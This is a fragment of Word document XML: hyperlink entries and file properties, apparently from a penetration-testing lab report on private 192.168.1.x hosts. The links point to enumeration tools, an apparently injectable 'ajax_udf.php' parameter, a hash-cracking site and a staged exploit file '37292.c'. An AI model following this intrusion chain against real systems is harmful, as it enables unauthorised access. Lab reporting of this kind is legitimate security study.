Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://labs.portcullis.co.uk/application/enum4linux/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.13/jabcd0cs/ajax_udf.php?q=1&amp;add_value=odm_user" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/submit/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:anne@192.168.1.12's" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.13/jabcd0cs/ajax_udf.php?q=1&amp;add_value=odm_user" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.6/37292.c" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file://192.168.1.4/IPC$" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.13/javascript/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nmap.org" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file://192.168.1.4/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:anne@192.168.1.12" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.1.13/jabcd0cs/ajax_udf.php?q=1&amp;add_value=odm_user" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.md5online.org/md5-decrypt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6928</Words>
  <Characters>39490</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>329</Lines>
  <Paragraphs>92</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>46326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2022-11-28T13:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-28T13:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>